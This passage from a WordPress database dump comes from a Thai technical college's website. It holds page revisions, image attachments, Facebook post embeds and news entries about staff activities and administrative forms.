(3352, 3, '2018-07-09 15:42:46', '2018-07-09 08:42:46', '<img class=\"aligncenter size-full wp-image-3349\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-41-31.jpg\" alt=\"\" width=\"195\" height=\"240\" /> <img class=\"aligncenter wp-image-3350\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-42-02.jpg\" alt=\"\" width=\"382\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3351\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-43-45.jpg\" alt=\"\" width=\"765\" height=\"318\" />', 'สุขศึกษาและพลศึกษา', '', 'inherit', 'closed', 'closed', '', '3348-revision-v1', '', '', '2018-07-09 15:42:46', '2018-07-09 08:42:46', '', 3348, 'http://www.technicrayong.ac.th/3348-revision-v1/', 0, 'revision', '', 0),
(3353, 3, '2018-07-09 15:42:57', '2018-07-09 08:42:57', '<img class=\"aligncenter size-full wp-image-3349\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-41-31.jpg\" alt=\"\" width=\"195\" height=\"240\" /> <img class=\"aligncenter wp-image-3350\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-42-02.jpg\" alt=\"\" width=\"382\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3351\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-43-45.jpg\" alt=\"\" width=\"765\" height=\"318\" />', 'สุขศึกษาและพลศึกษา', '', 'inherit', 'closed', 'closed', '', '3348-autosave-v1', '', '', '2018-07-09 15:42:57', '2018-07-09 08:42:57', '', 3348, 'http://www.technicrayong.ac.th/3348-autosave-v1/', 0, 'revision', '', 0),
(3354, 3, '2018-07-09 15:57:51', '2018-07-09 08:57:51', '<img class=\"aligncenter size-full wp-image-3355\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-58-20.jpg\" alt=\"\" width=\"195\" height=\"239\" /> <img class=\"aligncenter wp-image-3357\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-59-21.jpg\" alt=\"\" width=\"384\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3356\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-58-59.jpg\" alt=\"\" width=\"634\" height=\"316\" />', 'ภาษาไทย', '', 'publish', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b9%84%e0%b8%97%e0%b8%a2', '', '', '2018-07-09 15:57:51', '2018-07-09 08:57:51', '', 0, 'http://www.technicrayong.ac.th/?page_id=3354', 0, 'page', '', 0),
(3355, 3, '2018-07-09 15:57:11', '2018-07-09 08:57:11', '', '9-7-2561 15-58-20', '', 'inherit', 'closed', 'closed', '', '9-7-2561-15-58-20', '', '', '2018-07-09 15:57:11', '2018-07-09 08:57:11', '', 3354, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-15-58-20.jpg', 0, 'attachment', 'image/jpeg', 0),
(3356, 3, '2018-07-09 15:57:13', '2018-07-09 08:57:13', '', '9-7-2561 15-58-59', '', 'inherit', 'closed', 'closed', '', '9-7-2561-15-58-59', '', '', '2018-07-09 15:57:13', '2018-07-09 08:57:13', '', 3354, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-15-58-59.jpg', 0, 'attachment', 'image/jpeg', 0),
(3357, 3, '2018-07-09 15:57:20', '2018-07-09 08:57:20', '', '9-7-2561 15-59-21', '', 'inherit', 'closed', 'closed', '', '9-7-2561-15-59-21', '', '', '2018-07-09 15:57:20', '2018-07-09 08:57:20', '', 3354, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/9-7-2561-15-59-21.jpg', 0, 'attachment', 'image/jpeg', 0),
(3358, 3, '2018-07-09 15:57:51', '2018-07-09 08:57:51', '<img class=\"aligncenter size-full wp-image-3355\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-58-20.jpg\" alt=\"\" width=\"195\" height=\"239\" /> <img class=\"aligncenter wp-image-3357\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-59-21.jpg\" alt=\"\" width=\"384\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3356\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-58-59.jpg\" alt=\"\" width=\"634\" height=\"316\" />', 'ภาษาไทย', '', 'inherit', 'closed', 'closed', '', '3354-revision-v1', '', '', '2018-07-09 15:57:51', '2018-07-09 08:57:51', '', 3354, 'http://www.technicrayong.ac.th/3354-revision-v1/', 0, 'revision', '', 0),
(3359, 3, '2018-07-09 15:58:04', '2018-07-09 08:58:04', '<img class=\"aligncenter size-full wp-image-3355\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-58-20.jpg\" alt=\"\" width=\"195\" height=\"239\" /> <img class=\"aligncenter wp-image-3357\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-59-21.jpg\" alt=\"\" width=\"384\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3356\" src=\"/wp-content/uploads/2018/07/9-7-2561-15-58-59.jpg\" alt=\"\" width=\"634\" height=\"316\" />', 'ภาษาไทย', '', 'inherit', 'closed', 'closed', '', '3354-autosave-v1', '', '', '2018-07-09 15:58:04', '2018-07-09 08:58:04', '', 3354, 'http://www.technicrayong.ac.th/3354-autosave-v1/', 0, 'revision', '', 0),
(3360, 3, '2018-07-09 15:59:00', '0000-00-00 00:00:00', '', '', '', 'draft', 'closed', 'closed', '', '', '', '', '2018-07-09 15:59:00', '2018-07-09 08:59:00', '', 0, 'http://www.technicrayong.ac.th/?page_id=3360', 0, 'page', '', 0),
(3362, 3, '2018-07-10 09:08:22', '2018-07-10 02:08:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D620926961616829%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะครูแผนกวิชาอาหารฯ ร่วมกับ บมจ.พีทีที โกบอล เคมิคอล ร่วมฝึกประสบการณ์ในการจัดการภายในครัวจัดเลี้ยงและประกอบอาหารสำหรับขึ้นโต๊ะเสวย ร่วมกับ เชฟชุมพล แจ้งไพร คณะทีมงานจากโรงเรียนการอาหารไทย MSC ในโครงการ Walk Rally ยุติความรุนแรงภายในครอบครัว ปี 2561 ณ อ่างเก็บน้ำดอกกราย ตำบลแม่น้ำคู้ อำเภอปลวกแดง จังหวัดระยอง วันอาทิตย์ที่ 8 กรกฎาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%ad%e0%b8%b2%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0', '', '', '2018-07-10 09:14:59', '2018-07-10 02:14:59', '', 0, 'http://www.technicrayong.ac.th/?p=3362', 368, 'post', '', 0),
(3363, 3, '2018-07-10 09:07:55', '2018-07-10 02:07:55', '', '36889500_620926668283525_8491488229269176320_n', '', 'inherit', 'closed', 'closed', '', '36889500_620926668283525_8491488229269176320_n', '', '', '2018-07-10 09:07:55', '2018-07-10 02:07:55', '', 3362, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/36889500_620926668283525_8491488229269176320_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(3364, 3, '2018-07-10 09:08:22', '2018-07-10 02:08:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D620926961616829%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะครูแผนกวิชาอาหารและโภชนาการ วิทยาลัยเทคนิคระยอง ปฏิบัติงานร่วมกับบริษัท พีทีที โกบอล เคมิคอล จำกัด (มหาชน) ให้เข้าร่วมฝึกประสบการณ์ที่สำคัญในการจัดการภายในครัวจัดเลี้ยงและประกอบอาหารสำหรับขึ้นโต๊ะเสวยและแขกผู้ใหญ่ที่มาร่วมในโครงการ โดยการประกอบอาหารร่วมกับ เชฟชุมพล แจ้งไพร คณะทีมงานจากโรงเรียนการอาหารไทย MSC ในโครงการ Walk Rally ยุติความรุนแรงภายในครอบครัว ปี 2561 ณ อ่างเก็บน้ำดอกกราย ตำบลแม่น้ำคู้ อำเภอปลวกแดง จังหวัดระยอง วันอาทิตย์ที่ 8 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3362-revision-v1', '', '', '2018-07-10 09:08:22', '2018-07-10 02:08:22', '', 3362, 'http://www.technicrayong.ac.th/3362-revision-v1/', 0, 'revision', '', 0),
(3366, 3, '2018-07-10 09:11:00', '2018-07-10 02:11:00', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D621032191606306%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมประชุมการพัฒนาหลักสูตรและกำลังคนอาชีวศึกษา สู่อุตสาหกรรมหลักในEEC และSupply Chain ที่เกี่ยวข้อง อุตสาหกรรมท่องเที่ยวกลุ่มรายได้ดี อุตสาหกรรม อาหารและโภชนาการ. แปรรูปอาหาร และอุตสาหกรรมการแพทย์ครบวงจร ณ โรงแรมเดอะไทด์ รีสอร์ท บางแสน จังหวัดชลบุรี วันที่ 8-9 กรกฎาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2', '', '', '2018-07-10 09:11:00', '2018-07-10 02:11:00', '', 0, 'http://www.technicrayong.ac.th/?p=3366', 367, 'post', '', 0),
(3367, 3, '2018-07-10 09:10:47', '2018-07-10 02:10:47', '', '36828566_621031098273082_1240391721930457088_o', '', 'inherit', 'closed', 'closed', '', '36828566_621031098273082_1240391721930457088_o', '', '', '2018-07-10 09:10:47', '2018-07-10 02:10:47', '', 3366, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/36828566_621031098273082_1240391721930457088_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3368, 3, '2018-07-10 09:11:00', '2018-07-10 02:11:00', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D621032191606306%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมประชุมการพัฒนาหลักสูตรและกำลังคนอาชีวศึกษา สู่อุตสาหกรรมหลักในEEC และSupply Chain ที่เกี่ยวข้อง อุตสาหกรรมท่องเที่ยวกลุ่มรายได้ดี อุตสาหกรรม อาหารและโภชนาการ. แปรรูปอาหาร และอุตสาหกรรมการแพทย์ครบวงจร ณ โรงแรมเดอะไทด์ รีสอร์ท บางแสน จังหวัดชลบุรี วันที่ 8-9 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3366-revision-v1', '', '', '2018-07-10 09:11:00', '2018-07-10 02:11:00', '', 3366, 'http://www.technicrayong.ac.th/3366-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3369, 3, '2018-07-10 09:11:10', '2018-07-10 02:11:10', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D621032191606306%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมประชุมการพัฒนาหลักสูตรและกำลังคนอาชีวศึกษา สู่อุตสาหกรรมหลักในEEC และSupply Chain ที่เกี่ยวข้อง อุตสาหกรรมท่องเที่ยวกลุ่มรายได้ดี อุตสาหกรรม อาหารและโภชนาการ. แปรรูปอาหาร และอุตสาหกรรมการแพทย์ครบวงจร ณ โรงแรมเดอะไทด์ รีสอร์ท บางแสน จังหวัดชลบุรี วันที่ 8-9 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3366-autosave-v1', '', '', '2018-07-10 09:11:10', '2018-07-10 02:11:10', '', 3366, 'http://www.technicrayong.ac.th/3366-autosave-v1/', 0, 'revision', '', 0),
(3370, 3, '2018-07-10 09:15:08', '2018-07-10 02:15:08', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D620926961616829%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะครูแผนกวิชาอาหารฯ ร่วมกับ บมจ.พีทีที โกบอล เคมิคอล ร่วมฝึกประสบการณ์ในการจัดการภายในครัวจัดเลี้ยงและประกอบอาหารสำหรับขึ้นโต๊ะเสวย ร่วมกับ เชฟชุมพล แจ้งไพร คณะทีมงานจากโรงเรียนการอาหารไทย MSC ในโครงการ Walk Rally ยุติความรุนแรงภายในครอบครัว ปี 2561 ณ อ่างเก็บน้ำดอกกราย ตำบลแม่น้ำคู้ อำเภอปลวกแดง จังหวัดระยอง วันอาทิตย์ที่ 8 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3362-autosave-v1', '', '', '2018-07-10 09:15:08', '2018-07-10 02:15:08', '', 3362, 'http://www.technicrayong.ac.th/3362-autosave-v1/', 0, 'revision', '', 0),
(3371, 3, '2018-07-10 09:12:31', '2018-07-10 02:12:31', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D620926961616829%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะครูแผนกวิชาอาหารและโภชนาการ ร่วมกับบริษัท พีทีที โกบอล เคมิคอล จำกัด (มหาชน) เข้าร่วมฝึกประสบการณ์ที่สำคัญในการจัดการภายในครัวจัดเลี้ยงและประกอบอาหารสำหรับขึ้นโต๊ะเสวย โดยการประกอบอาหารร่วมกับ เชฟชุมพล แจ้งไพร คณะทีมงานจากโรงเรียนการอาหารไทย MSC ในโครงการ Walk Rally ยุติความรุนแรงภายในครอบครัว ปี 2561 ณ อ่างเก็บน้ำดอกกราย ตำบลแม่น้ำคู้ อำเภอปลวกแดง จังหวัดระยอง วันอาทิตย์ที่ 8 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3362-revision-v1', '', '', '2018-07-10 09:12:31', '2018-07-10 02:12:31', '', 3362, 'http://www.technicrayong.ac.th/3362-revision-v1/', 0, 'revision', '', 0),
(3372, 3, '2018-07-10 09:14:59', '2018-07-10 02:14:59', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D620926961616829%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะครูแผนกวิชาอาหารฯ ร่วมกับ บมจ.พีทีที โกบอล เคมิคอล ร่วมฝึกประสบการณ์ในการจัดการภายในครัวจัดเลี้ยงและประกอบอาหารสำหรับขึ้นโต๊ะเสวย ร่วมกับ เชฟชุมพล แจ้งไพร คณะทีมงานจากโรงเรียนการอาหารไทย MSC ในโครงการ Walk Rally ยุติความรุนแรงภายในครอบครัว ปี 2561 ณ อ่างเก็บน้ำดอกกราย ตำบลแม่น้ำคู้ อำเภอปลวกแดง จังหวัดระยอง วันอาทิตย์ที่ 8 กรกฎาคม 2561', '', 'inherit', 'closed', 'closed', '', '3362-revision-v1', '', '', '2018-07-10 09:14:59', '2018-07-10 02:14:59', '', 3362, 'http://www.technicrayong.ac.th/3362-revision-v1/', 0, 'revision', '', 0),
(3373, 3, '2018-07-10 09:53:29', '2018-07-10 02:53:29', '', '10-7-2561 9-53-19', '', 'inherit', 'closed', 'closed', '', '10-7-2561-9-53-19', '', '', '2018-07-10 09:53:29', '2018-07-10 02:53:29', '', 3326, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-9-53-19.jpg', 0, 'attachment', 'image/jpeg', 0),
(3374, 3, '2018-07-10 09:53:38', '2018-07-10 02:53:38', '', '10-7-2561 9-53-50', '', 'inherit', 'closed', 'closed', '', '10-7-2561-9-53-50', '', '', '2018-07-10 09:53:38', '2018-07-10 02:53:38', '', 3326, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-9-53-50.jpg', 0, 'attachment', 'image/jpeg', 0),
(3375, 3, '2018-07-10 09:53:40', '2018-07-10 02:53:40', '', '10-7-2561 9-54-45', '', 'inherit', 'closed', 'closed', '', '10-7-2561-9-54-45', '', '', '2018-07-10 09:53:40', '2018-07-10 02:53:40', '', 3326, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-9-54-45.jpg', 0, 'attachment', 'image/jpeg', 0),
(3376, 3, '2018-07-10 09:55:21', '2018-07-10 02:55:21', '<img class=\"aligncenter size-full wp-image-3373\" src=\"/wp-content/uploads/2018/07/10-7-2561-9-53-19.jpg\" alt=\"\" width=\"194\" height=\"243\" /> <img class=\"aligncenter wp-image-3375\" src=\"/wp-content/uploads/2018/07/10-7-2561-9-54-45.jpg\" alt=\"\" width=\"378\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3374\" src=\"/wp-content/uploads/2018/07/10-7-2561-9-53-50.jpg\" alt=\"\" width=\"967\" height=\"629\" />', 'เทคโนโลยีสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '3326-revision-v1', '', '', '2018-07-10 09:55:21', '2018-07-10 02:55:21', '', 3326, 'http://www.technicrayong.ac.th/3326-revision-v1/', 0, 'revision', '', 0),
(3379, 3, '2018-07-10 10:05:08', '2018-07-10 03:05:08', '', '10-7-2561 10-06-54', '', 'inherit', 'closed', 'closed', '', '10-7-2561-10-06-54', '', '', '2018-07-10 10:05:08', '2018-07-10 03:05:08', '', 1516, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg', 0, 'attachment', 'image/jpeg', 0),
(3380, 3, '2018-07-10 10:05:40', '2018-07-10 03:05:40', ' \r\n\r\n<img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\r\n<h3>**การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง(ID PLAN) <a href=\"/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%99%E0%B9%80%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88/?preview_id=3020&preview_nonce=9d43a6f5df&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-07-10 10:05:40', '2018-07-10 03:05:40', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(3382, 3, '2018-07-10 10:12:44', '2018-07-10 03:12:44', '', '145623013221', '', 'inherit', 'closed', 'closed', '', '145623013221', '', '', '2018-07-10 10:12:44', '2018-07-10 03:12:44', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/145623013221.jpg', 0, 'attachment', 'image/jpeg', 0),
(3383, 3, '2018-07-10 10:23:02', '2018-07-10 03:23:02', '', '10-7-2561 10-25-00', '', 'inherit', 'closed', 'closed', '', '10-7-2561-10-25-00', '', '', '2018-07-10 10:23:02', '2018-07-10 03:23:02', '', 1545, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-10-25-00.jpg', 0, 'attachment', 'image/jpeg', 0),
(3384, 3, '2018-07-10 10:24:46', '2018-07-10 03:24:46', ' \r\n\r\n<img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3383\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-25-00.jpg\" alt=\"\" width=\"780\" height=\"645\" />\r\n<h4><span style=\"color: #0000ff;\">** <a href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-.doc\">แบบฟอร์ม สผ.งาน</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><span style=\"color: #339966;\">**แบบฟอร์มการจัดทำ SPEC</span></span></h4>\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มคุณลักษณะครุภัณฑ์.doc\">แบบฟอร์มคุณลักษณะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ขั้นตอนการจัดทำSPEC.pdf\">ขั้นตอนการจัดทำSPEC</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์.doc\">ข้อมูลประกอบการจัดทำคุณลักษณะเฉพาะครุภัณฑ์</a></span>\r\n\r\n<span style=\"color: #ff0000;\"> - <a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/03/ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์-_.doc\">ตัวอย่างรายงานผลการจัดทำคุณลักษณะเฉพาะครุภัณฑ์ </a></span>\r\n\r\n ', 'งานพัสดุ', '', 'inherit', 'closed', 'closed', '', '1545-revision-v1', '', '', '2018-07-10 10:24:46', '2018-07-10 03:24:46', '', 1545, 'http://www.technicrayong.ac.th/1545-revision-v1/', 0, 'revision', '', 0),
(3386, 3, '2018-07-10 10:28:07', '2018-07-10 03:28:07', '', '10-7-2561 10-29-52', '', 'inherit', 'closed', 'closed', '', '10-7-2561-10-29-52', '', '', '2018-07-10 10:28:07', '2018-07-10 03:28:07', '', 1516, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-10-29-52.jpg', 0, 'attachment', 'image/jpeg', 0),
(3387, 3, '2018-07-10 10:28:30', '2018-07-10 03:28:30', ' \r\n\r\n<img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3386\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-29-52.jpg\" alt=\"\" width=\"691\" height=\"331\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\r\n<h3>**การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง(ID PLAN) <a href=\"/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%99%E0%B9%80%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88/?preview_id=3020&preview_nonce=9d43a6f5df&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-07-10 10:28:30', '2018-07-10 03:28:30', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(3388, 3, '2018-07-10 10:31:21', '2018-07-10 03:31:21', '', '10-7-2561 10-33-19', '', 'inherit', 'closed', 'closed', '', '10-7-2561-10-33-19', '', '', '2018-07-10 10:31:21', '2018-07-10 03:31:21', '', 1572, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/10-7-2561-10-33-19.jpg', 0, 'attachment', 'image/jpeg', 0),
(3389, 3, '2018-07-10 10:31:43', '2018-07-10 03:31:43', '<img class=\"aligncenter size-full wp-image-1614\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"381\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3388\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-33-19.jpg\" alt=\"\" width=\"279\" height=\"339\" />', 'งานอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '1572-revision-v1', '', '', '2018-07-10 10:31:43', '2018-07-10 03:31:43', '', 1572, 'http://www.technicrayong.ac.th/1572-revision-v1/', 0, 'revision', '', 0),
